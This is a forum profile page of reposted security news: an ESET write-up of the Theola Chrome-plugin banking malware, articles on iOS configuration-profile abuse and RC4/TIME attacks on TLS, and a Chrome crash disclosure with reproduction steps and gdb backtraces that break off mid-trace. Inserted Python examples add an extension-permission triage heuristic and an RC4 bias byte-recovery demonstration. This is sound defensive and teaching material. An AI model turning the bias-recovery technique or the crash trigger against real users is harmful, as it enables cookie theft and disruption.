
Nytro

Everything posted by Nytro

  1. Instead of moving crap from one place to another, they should buy some more servers, because this Facebook has been running like shit for a while now.
  2. A few details?
  3. [h=1]How Theola malware uses a Chrome plugin for banking fraud[/h]
By Aleksandr Matrosov, posted 13 Mar 2013 at 02:50PM

Win32/Theola is one of the most malicious components of the notorious bootkit family Win32/Mebroot.FX (known since 2007). The Theola family encompasses malicious browser plugins installed by Mebroot for banking fraud operations. We have been tracking an increase in detections of these plugins since the end of January 2013. The countries where Theola is most commonly detected are the Netherlands, Norway, Italy, Denmark and the Czech Republic. ESET Virus Radar statistics show the regions most affected by Theola infection during the last week in the map below.

Win32/Mebroot.FX uses typical MBR infection techniques, with a malicious int13 handler used for access to the hard drive components. Malicious components are loaded in the following order:

In this blog post I'm concentrating on the analysis of the malicious browser plugins and on answering the question of how money is stolen from a user's infected machine.

[h=3]Chrome plugin[/h]
Win32/Theola.F is a Google Chrome plugin based on the NPAPI interface (Netscape Plugin Application Programming Interface). The malicious plugin has a native module and is packed in the CRX format (CRX Package Format). The CRX container contains the following manifest file with the permissions shown:

The most interesting string in the manifest is "permissions", describing the activity allowed for this plugin. This set of permissions is enough to allow fraudulent, malicious operations. Win32/Theola loads in the Google Chrome browser like this:

After deobfuscation, the first JavaScript method loads the native module as the default plugin for Google Chrome:

This JavaScript module modifies the POST tracking method for all web forms on the loaded web page. By making password input fields visible, this method makes a useful combination (for the attacker) with the embedded video recording functionality described below.

The plugin loaded in the browser extensions panel looks like this:

The routine NP_GetEntryPoints() calls the plugin load process and gets the pointers to the other functions needed for working with the plugin within the browser. The decompiled code of NP_GetEntryPoints() is presented here, with the Theola plugin interface:

The image directly below shows the reconstructed virtual method table (vtable) as seen in Win32/Theola's main functionality. Theola has video recording functionality based on the open source x264 library for recording video in MPEG format.

When the plugin has already started up, the function addListners() loads the JavaScript code for tracking web activity on the infected machine. The JavaScript code for manipulating URLs is presented here:

The method beforeNavigate() in the native module is presented here:

If activity is detected on the banking web page, then Win32/Theola sends all sensitive information (passwords, credit card numbers, etc.) to a special named pipe. The name of the pipe is generated by the following algorithm:

All communications with the kernel-mode module and other user-mode modules are implemented with special named pipe handlers in the plugin. Each handler is responsible for the execution of a specified type of event in the execution process.

[h=3]Conclusion[/h]
Google Chrome is one of the most popular browsers in the world and its popularity among malware developers is also growing. Win32/Theola provides its malicious module as a Chrome plugin: this is more difficult to detect because the plugin uses only documented API methods for controlling web activity. This documented API is adequate for manipulating sensitive data submitted into web forms. Much banking malware uses user-mode hooks for intercepting network activity, but Win32/Theola uses documented and legitimate methods just as effectively and by doing so is better able to bypass detection by security software.

Special thanks to my colleague Anton Cherepanov

Aleksandr Matrosov, Security Intelligence Team Lead

SHA1 hashes for analyzed samples:
Win32/Theola.F (CRX plugin): 0a74c1897a8a3a56cbc4bd433e100e63f448c136
Win32/Theola.D (dll module): 5591d013f38f64f2695366ff4cb4727c94a266e9

Source: How Theola malware uses a Chrome plugin for banking fraud - We Live Security
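The ESET post makes the point that the manifest's "permissions" entry, plus a native NPAPI module, is all a Chrome extension needs to read and alter web forms without any API hooking. The script below is an added example (not ESET's tooling and not Theola's real manifest, which the post only shows as an image): it triages a manifest.json pulled out of a CRX for exactly those properties. The manifest keys it inspects (permissions, plugins, content_scripts, run_at) are real manifest keys; the weights, the risk levels and the sample manifest are constructed for this example.

```python
import json

# Host-permission patterns that grant access to every site the user visits.
BROAD_HOST_PATTERNS = ("<all_urls>", "*://*/*", "http://*/*", "https://*/*")

# API permission -> (heuristic weight, why it matters for credential theft).
# Weights are this example's own scale, not a Chrome or ESET rating.
SENSITIVE_PERMISSIONS = {
    "webRequest": (2, "observes every request the browser makes"),
    "webRequestBlocking": (3, "can rewrite or redirect requests before they leave"),
    "tabs": (1, "reads the URL and title of every open tab"),
    "cookies": (2, "reads session cookies for permitted hosts"),
    "webNavigation": (1, "tracks every navigation event"),
}


def triage_manifest(manifest: dict) -> dict:
    """Return a heuristic score, a level and human-readable findings for one manifest."""
    findings, score = [], 0
    perms = manifest.get("permissions", [])

    # NPAPI native modules (manifest v2-era "plugins" key) run with the browser's
    # full privileges; this is how Theola ships its native component.
    for plugin in manifest.get("plugins", []):
        findings.append(f"native NPAPI module declared: {plugin.get('path')}")
        score += 5

    broad = [p for p in perms if p in BROAD_HOST_PATTERNS]
    if broad:
        findings.append(f"host permission on every site: {', '.join(broad)}")
        score += 3

    for name, (weight, why) in SENSITIVE_PERMISSIONS.items():
        if name in perms:
            findings.append(f"permission {name}: {why}")
            score += weight

    # A content script injected into every page at document_start runs before
    # the page's own scripts, which is when a form's submit path can be altered.
    for cs in manifest.get("content_scripts", []):
        if any(m in BROAD_HOST_PATTERNS for m in cs.get("matches", [])):
            when = cs.get("run_at", "document_idle")
            findings.append(f"content script on all sites (run_at={when}): {cs.get('js')}")
            score += 3 if when == "document_start" else 2

    level = "high" if score >= 8 else "medium" if score >= 4 else "low"
    return {"score": score, "level": level, "findings": findings}


# Constructed sample manifest for this example (not a real extension).
SAMPLE_MANIFEST = json.loads("""
{
  "name": "Update Helper",
  "version": "1.0",
  "manifest_version": 2,
  "permissions": ["<all_urls>", "tabs", "webRequest", "webRequestBlocking"],
  "plugins": [{"path": "nphelper.dll", "public": false}],
  "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"],
                       "run_at": "document_start"}],
  "background": {"scripts": ["bg.js"]}
}
""")

# A benign manifest for comparison: one narrow permission, no native code.
BENIGN_MANIFEST = {"name": "Notes", "version": "1.0", "manifest_version": 2,
                   "permissions": ["storage"]}

if __name__ == "__main__":
    for m in (SAMPLE_MANIFEST, BENIGN_MANIFEST):
        report = triage_manifest(m)
        print(f"{m['name']}: {report['level']} (score {report['score']})")
        for f in report["findings"]:
            print("  -", f)
```

Run on a directory of unpacked extensions, the score orders them for manual review; the "plugins" finding alone is worth a look on any machine where an NPAPI module is not expected.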
  4. [h=3]Critical iOS vulnerability in Configuration Profiles pose malware threat[/h]
Posted by: Mohit Kumar on Thursday, March 14, 2013

a vulnerability that could allow hackers to control and spy on iPhones. A major security vulnerability in iOS configuration profiles poses a malware threat. The vulnerability affects files known as mobileconfig files, which are used by cell phone carriers to configure system-level settings. These can include Wi-Fi, VPN, email, and APN settings. Apple used to use them to deliver patches, and carriers sometimes use them to distribute updates.

Adi Sharabani, CEO and co-founder of Skycure, demonstrated how sensitive information, including the victim's exact location, could be retrieved while also controlling the user's iPhone. In the demo, he set up a fake website with a prompt to install a configuration profile and sent the link out to the victim. After installing it, he found out they were able to pull passwords and other data without his knowledge.

These malicious profiles can be emailed or downloaded from web pages, and after being installed an attacker is able to change a large number of iPhone settings. If used maliciously, these profiles can be very dangerous. Even though their use is approved by Apple, they aren't subject to the standard sandboxing rules that apply to third-party App Store apps and websites. Other than an attack on privacy, this could lead to more dangerous consequences; as an example, it is quite easy to change a GPS destination while driving and send the smartphone owner to a location the attacker chooses.

Source: Critical iOS vulnerability in Configuration Profiles pose malware threat - Hacking News
  5. [h=1]Two new attacks on SSL decrypt authentication cookies[/h]
[h=2]Aging standard isn't holding up very well in the face of sophisticated attacks.[/h]
by Dan Goodin - Mar 14 2013, 6:05pm GTBST

Researchers have devised two new attacks on the Transport Layer Security and Secure Sockets Layer protocols, the widely used encryption schemes used to secure e-commerce transactions and other sensitive traffic on the Internet. The pair of exploits—one presented at the just-convened 20th International Workshop on Fast Software Encryption and the other scheduled to be unveiled on Thursday at the Black Hat security conference in Amsterdam—don't pose an immediate threat to the millions of people who rely on the Web-encryption standards. Still, they're part of a growing constellation of attacks with names including BEAST, CRIME, and Lucky 13 that allow determined hackers to silently decrypt protected browser cookies used to log in to websites. Together, they underscore the fragility of the aging standards as they face an arsenal of increasingly sophisticated exploits.

"It illustrates how serious this is that there are so many attacks going on involving a protocol that's been around for years and that's so widely trusted and used," Matthew Green, a professor specializing in cryptography at Johns Hopkins University, told Ars. "The fact that you now have CRIME, BEAST, Lucky 13, and these new two attacks within the same week really illustrates what a problem we're facing."

The most serious of this week's attacks exploits weaknesses in RC4, a stream cipher that researchers estimate is used to encrypt about 50 percent of the world's TLS traffic. Cryptographers have long known of flaws in RC4. Specifically, some of the pseudo-random bytes the cipher used to encode messages were predictable. But until now scientists hadn't devised a practical way to exploit the shortcoming.

A team from Royal Holloway, University of London, and the University of Illinois-Chicago has discovered that the small "biases" contained in RC4 can be manipulated in a way that reveals a limited amount of the plaintext in an encrypted data stream. It requires attackers to receive tens of millions of different encryptions of the same message. By statistically sampling them, the lack of randomness can be exploited to deduce parts of the encrypted message.

"Some of us have been worried for quite a while that RC4 was becoming the dominant cipher of choice in TLS," Royal Holloway scientist Kenneth G. Paterson told Ars. "We knew that RC4 had significant problems. What we didn't know was how to exploit them in TLS. Now we do. Vendors and users are on notice: this attack is only going to get stronger."

Because only small parts of a message can be decrypted, the attack works best against ciphertext that contains known strings in a fixed location, such as authentication cookies.

"Unfortunately, if your connection is encrypted using RC4 (as is the case with Gmail), then each time you make a fresh connection to the Gmail site, you're sending a new encrypted copy of the same cookie," Green wrote in a blog post describing the attack. "If the session is renegotiated (i.e., uses a different key) between those connections, then the attacker can build up the list of ciphertexts he needs."

The number of TLS key renegotiations in the typical Web session is vastly insufficient to satisfy the tens of millions of encryptions attackers need. The scientists—who include Nadhem AlFardan, Dan Bernstein, Kenny Paterson, Bertram Poettering, and Jacob Schuldt—have therefore proposed that JavaScript working with a man-in-the-middle attacker can rapidly generate all the encrypted connections needed for the attack. A man-in-the-middle position is when the attacker has a connection between the two parties and the ability to monitor or even tamper with the messages sent back and forth.

[h=2]It's about TIME[/h]
This week's other TLS attack is also able to read HTTPS-protected login credentials when end users transmit them to Web servers. The so-called TIME exploit—short for Timing Info-leak Made Easy—is in some respects a refinement of the CRIME attack that successfully decrypted HTTPS-protected browser cookies used to access user accounts on Github.com, Dropbox.com, and Stripe.com. That earlier exploit worked when both the targeted website and browser used the Google-spawned SPDY protocol or TLS compression to reduce the number of bytes contained in a file or data stream by removing redundant information. By guessing the contents of an encrypted payload character by character and then analyzing whether the compressed ciphertext grew or shrank in size, researchers Juliano Rizzo and Thai Duong were able to slowly decipher the contents.

TIME works in a similar fashion. It uses JavaScript that forces a browser to send multiple requests to an online bank or other website that uses TLS. But rather than measure the number of bytes contained in the encrypted request sent by the end user, TIME measures the time it takes for websites to respond with responses that have been both encrypted and compressed. Responses that are faster will on average contain fewer bytes, allowing attackers to know that the plaintext contained in a particular guess was also contained in the encrypted data stream. By forcing a victim browser to send hundreds or thousands of requests and comparing subtle differences in the time it takes for the website to respond, the TIME attack decrypts the payload character by character until all of the contents are revealed.

"The attacker no longer needs to be an eavesdropper," Tal Be'ery, Web security research team leader at security firm Imperva, said of the TIME attack he helped develop. "The attacker can just lead the victim to his site and from that point onward the attacker only needs to apply certain JavaScript to get the victim's secret data."

Most of the previous exploits on TLS require the attacker to have a "man-in-the-middle" position. When combined with the CRIME techniques, TIME has no such restrictions. It's also potentially more effective than either the Lucky 13 or the other attack from this week because it requires hundreds of thousands of requests, rather than tens of millions or hundreds of millions.

Be'ery said the vulnerability TIME exploits resides more in browsers than in TLS itself. Specifically, the problem lies in a bedrock security principle known as the same origin policy. It prevents cookies and most other content set by one domain from being able to read or modify data from another domain. The researcher said the policy should be extended to prevent timing attacks.

"Just as the browser doesn't let JavaScript directly get the size of the request or the response to other sites... it should stop the timing information from leaking, because it enables the attacker to infer on the secret information," he told Ars. "It shouldn't be allowed to do so. Browsers need to have some mechanism for the server to say 'I don't want to give any information about this specific resource. I don't want to let it be timed.'"

[h=2]Not enough Band-Aids[/h]
Given the hurdle of collecting vast numbers of encrypted packets, it's unlikely either of this week's attacks—or last month's Lucky 13 exploit, for that matter—will have much practical application right away. But as new techniques are developed and new vulnerabilities are discovered, the attacks are likely to improve and may at some point overcome the resistance TLS has so far shown in withstanding the string of new exploits. Ironically, a chief reason for the large concentration of RC4-protected TLS traffic was its ability to withstand BEAST attacks. Now that both Lucky 13 and one of this week's attacks target the cipher, security engineers are running out of Band-Aids with which to harden TLS. So far, website operators and browser developers have been hesitant to replace vulnerable versions of TLS with newer versions out of fear that the changes will disrupt millions of connections.

"It's not totally clear what can be done," Green told Ars, referring to a reliable fix for the Web encryption standards. "In the short term, we have better versions of TLS and we're not using them for a bunch of silly reasons, mostly to do with backward compatibility. Browser companies and people who make servers really need to get on this and they need to start moving to new versions and TLS. They need to do it soon, before these attacks become really practical."

Source: Two new attacks on SSL decrypt authentication cookies | Ars Technica
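The article says RC4's keystream bytes carry small "biases" and that sampling many encryptions of the same fixed-position secret lets an observer deduce it. The script below is an added example, not code from the Ars article or from the Royal Holloway team: it implements RC4 itself, measures the oldest of those biases (the second keystream byte is 0 about twice as often as a uniform byte, roughly 1/128 instead of 1/256), and then models the cookie scenario on raw RC4 with fresh random keys to show why majority voting over the ciphertexts recovers the byte. It is the measurement a practitioner can rerun to justify removing RC4 from a TLS configuration; it says nothing about how to collect such samples from a real connection. The 16-byte keys, the seeds and the sample counts are this example's choices.

```python
import random
from collections import Counter

SECOND_BYTE = 1  # 0-based index of RC4's second keystream byte, the biased position


def rc4_keystream(key: bytes, n: int) -> bytes:
    """First n keystream bytes of RC4 for `key`: key scheduling, then generation."""
    s = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm (KSA)
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):  # pseudo-random generation algorithm (PRGA)
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def sample_keystream_byte(position: int, trials: int, seed: int) -> list:
    """Keystream byte at `position` under `trials` fresh random 16-byte keys.
    The RNG is seeded so the measurement is reproducible."""
    rng = random.Random(seed)
    samples = []
    for _ in range(trials):
        key = bytes(rng.getrandbits(8) for _ in range(16))
        samples.append(rc4_keystream(key, position + 1)[position])
    return samples


def measure_bias(position: int, value: int, trials: int, seed: int = 1) -> dict:
    """How often the keystream byte at `position` equals `value`, relative to the
    trials/256 a uniformly random byte would give (ratio 1.0 means no bias)."""
    hits = sum(1 for z in sample_keystream_byte(position, trials, seed) if z == value)
    expected = trials / 256
    return {"hits": hits, "uniform_expected": expected, "ratio": hits / expected}


def recover_fixed_byte(secret: int, trials: int, seed: int = 2) -> int:
    """Model of the cookie scenario: the same secret byte is encrypted at the
    biased position under `trials` different keys and only the ciphertext bytes
    are observed. Since Z_2 == 0 is the single most likely keystream value,
    C_2 == secret ^ 0 is the most frequent ciphertext value, so a plain
    majority vote over the ciphertexts returns the secret."""
    ciphertexts = (secret ^ z for z in sample_keystream_byte(SECOND_BYTE, trials, seed))
    value, _count = Counter(ciphertexts).most_common(1)[0]
    return value


if __name__ == "__main__":
    print(measure_bias(SECOND_BYTE, 0, 20000))      # ratio close to 2.0
    print(measure_bias(SECOND_BYTE, 7, 20000))      # ratio close to 1.0
    print(hex(recover_fixed_byte(0x41, 20000)))     # 0x41
```

With 20,000 keys the biased value stands out by many standard deviations; the published TLS attack needs tens of millions of samples because it works on ciphertexts of a full cookie and on weaker biases at later positions, not on this single strong one.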
  6. Blackhat 2010 - Attacking Phone Privacy
Description: Our most popular phone technologies use decade-old proprietary cryptography. GSM's 64bit A5/1 cipher, for instance, is vulnerable to time memory trade-offs but commercial cracking hardware costs hundreds of thousands of dollars. We discuss how cryptographic improvements and the power of the community created an open GSM decrypt solution that runs on commodity hardware. Besides GSM we discuss weaknesses in DECT cordless phones. The talk concludes with an overview of mitigation steps for GSM and DECT in response to our research, some of which are already being implemented.
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source:
Source: Blackhat 2010 - Attacking Phone Privacy
  7. Google Chrome 21.0.1180.57 NULL Pointer
Authored by Heyder Andrade

Google Chrome versions 21.0.1180.57 and below suffer from a NULL pointer vulnerability in InspectDataSource::StartDataRequest.

---| overview
Vulnerability: Chrome Null Pointer in InspectDataSource::StartDataRequest
Date: 03/14/2012
Author: @HeyderAndrade (heyder.andrade[at]gmail[dot]com)
Chrome Version: =< 21.0.1180.57 stable
Operating System Tested: Win XP SP2, WIN7, Mac OS X 10.6.8 (10K549), Linux Ubuntu 12.04
Architecture: x86 and Amd64

---| steps to reproduce this crash
1. Open the browser and visit any site that has an SSL certificate signed by a CA that is not trusted. An SSL error will be shown; DON'T click "proceed anyway".
2. Open a new tab and access chrome://inspect
PS: I believe it should work with any SSL error, but I tested only with the invalid CA error.

---| original OSX Crash Report
Process: Google Chrome [767]
Path: /Applications/Google Chrome.app/Contents/MacOS/Google Chrome
Identifier: com.google.Chrome
Version: 21.0.1180.57 (1180.57)
Code Type: X86 (Native)
Parent Process: launchd [158]
Date/Time: 2012-08-08 22:53:09.442 -0300
OS Version: Mac OS X 10.6.8 (10K549)
Report Version: 6
Interval Since Last Report: 19713 sec
Crashes Since Last Report: 1
Per-App Interval Since Last Report: 19374 sec
Per-App Crashes Since Last Report: 1
Anonymous UUID: B5BA5F00-E166-4923-9393-E0FC63561975
Exception Type: EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000000
Crashed Thread: 0 CrBrowserMain Dispatch queue: com.apple.main-thread

---| source code
This vulnerability lies in the function call DCHECK (line 118 of inspect_ui.cc): the render_process_host can be NULL.
file: browser/ui/webui/inspect_ui.cc
line: 188
function: DCHECK(render_process_host);

---| source code fix
if (!render_process_host->HasConnection()) continue;

---| timeline of disclosure
- discovery of vulnerability - Aug 08, 2012
- code.google.com report - Aug 15, 2012
- Chromium community fix - Oct 11, 2012
- This disclosure - Mar 14, 2013

---| references
https://chromiumcodereview.appspot.com/11066114/ (for some reason this issue was removed)
https://code.google.com/p/chromium/issues/detail?id=142979 (not public)

Starting program: /home/user/chrome-linux/chrome --debug https://caixa.gov.br
[Thread debugging using libthread_db enabled]
[New Thread 0xb2735b70 (LWP 10475)]
[New Thread 0xb1f34b70 (LWP 10476)]
[New Thread 0xb1733b70 (LWP 10477)]
[New Thread 0xb280db70 (LWP 10478)]
[New Thread 0xb0666b70 (LWP 10479)]
[New Thread 0xafe65b70 (LWP 10480)]
[New Thread 0xaf664b70 (LWP 10481)]
[New Thread 0xaee63b70 (LWP 10482)]
[New Thread 0xae662b70 (LWP 10483)]
[New Thread 0xade61b70 (LWP 10484)]
[New Thread 0xad660b70 (LWP 10485)]
[New Thread 0xace5fb70 (LWP 10486)]
[New Thread 0xace3eb70 (LWP 10487)]
[New Thread 0xace1db70 (LWP 10488)]
[New Thread 0xacdfcb70 (LWP 10489)]
[New Thread 0xac4eeb70 (LWP 10490)]
[Thread 0xac4eeb70 (LWP 10490) exited]
[New Thread 0xac4eeb70 (LWP 10491)]
[New Thread 0xab0fbb70 (LWP 10492)]
[New Thread 0xaa8fab70 (LWP 10497)]
[New Thread 0xaa0f9b70 (LWP 10498)]
[New Thread 0xa9282b70 (LWP 10515)]
[Thread 0xa9282b70 (LWP 10515) exited]
[New Thread 0xa97abb70 (LWP 10516)]
[New Thread 0xa978ab70 (LWP 10519)]
[New Thread 0xa9769b70 (LWP 10520)]

Program received signal SIGSEGV, Segmentation fault.
0xb40ea92b in (anonymous namespace)::InspectDataSource::StartDataRequest(std::string const&, bool, int) ()
#0 0xb40ea92b in (anonymous namespace)::InspectDataSource::StartDataRequest(std::string const&, bool, int) ()
#1 0xb40caf9b in base::internal::Invoker<4, base::internal::BindState<base::internal::RunnableAdapter<void (ChromeURLDataManager::DataSource::*)(std::string const&, bool, int)>, void (*)(ChromeURLDataManager::DataSource*, std::string const&, bool, int), void (*)(ChromeURLDataManager::DataSource*, std::string, bool, int)>, void (*)(ChromeURLDataManager::DataSource*, std::string const&, bool, int)>::Run(base::internal::BindStateBase*) ()
#2 0xb498c220 in MessageLoop::RunTask(base::PendingTask const&) ()
#3 0xb498c8c2 in MessageLoop::DeferOrRunPendingTask(base::PendingTask const&) ()
#4 0xb498cc31 in MessageLoop::DoWork() ()
#5 0xb49d58be in base::MessagePumpGlib::RunWithDispatcher(base::MessagePump::Delegate*, base::MessagePumpDispatcher*) ()
#6 0xb49d543c in base::MessagePumpGlib::Run(base::MessagePump::Delegate*) ()
#7 0xb498846e in MessageLoop::RunInternal() ()
#8 0xb49a4ae9 in base::RunLoop::Run() ()
#9 0xb46513f5 in ChromeBrowserMainParts::MainMessageLoopRun(int*) ()
#10 0xb65262ec in content::BrowserMainLoop::RunMainMessageLoopParts() ()
#11 0xb6527280 in (anonymous namespace)::BrowserMainRunnerImpl::Run() ()
#12 0xb65247f3 in BrowserMain(content::MainFunctionParams const&) ()
#13 0xb48fb758 in content::RunNamedProcessTypeMain(std::string const&, content::MainFunctionParams const&, content::ContentMainDelegate*) ()
#14 0xb48fb8b0 in content::ContentMainRunnerImpl::Run() ()
#15 0xb48fa797 in content::ContentMain(int, char const**, content::ContentMainDelegate*) ()
#16 0xb3fbe60b in ChromeMain ()
#17 0xb3fbe5c2 in main ()

Thread 25 (Thread 0xa9769b70 (LWP 10520)):
#0 0xb3d80430 in __kernel_vsyscall ()
#1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6
#2 0xb2a96718 in ??
() from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 24 (Thread 0xa978ab70 (LWP 10519)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6 #2 0xb2a96718 in ?? 
() from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 23 (Thread 0xa97abb70 (LWP 10516)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6 #2 0xb2a96718 in ?? 
() from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 21 (Thread 0xaa0f9b70 (LWP 10498)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49be489 in 
base::SequencedWorkerPool::Inner::ThreadLoop(base::SequencedWorkerPool::Worker*) () #4 0xb49bec19 in base::SequencedWorkerPool::Worker::Run() () #5 0xb49bf733 in base::SimpleThread::ThreadMain() () #6 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #7 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #8 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 20 (Thread 0xaa8fab70 (LWP 10497)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365342 in pthread_cond_timedwait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b24cc in base::ConditionVariable::TimedWait(base::TimeDelta const&) () #3 0xb49b36dd in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb498e11a in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #5 0xb498846e in MessageLoop::RunInternal() () #6 0xb49a4ae9 in base::RunLoop::Run() () #7 0xb498775e in MessageLoop::Run() () #8 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #9 0xb49bfa91 in base::Thread::ThreadMain() () #10 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #11 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #12 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 19 (Thread 0xab0fbb70 (LWP 10492)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49be489 in base::SequencedWorkerPool::Inner::ThreadLoop(base::SequencedWorkerPool::Worker*) () #4 0xb49bec19 in base::SequencedWorkerPool::Worker::Run() () #5 0xb49bf733 in base::SimpleThread::ThreadMain() () #6 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #7 0xb336096e in start_thread () from 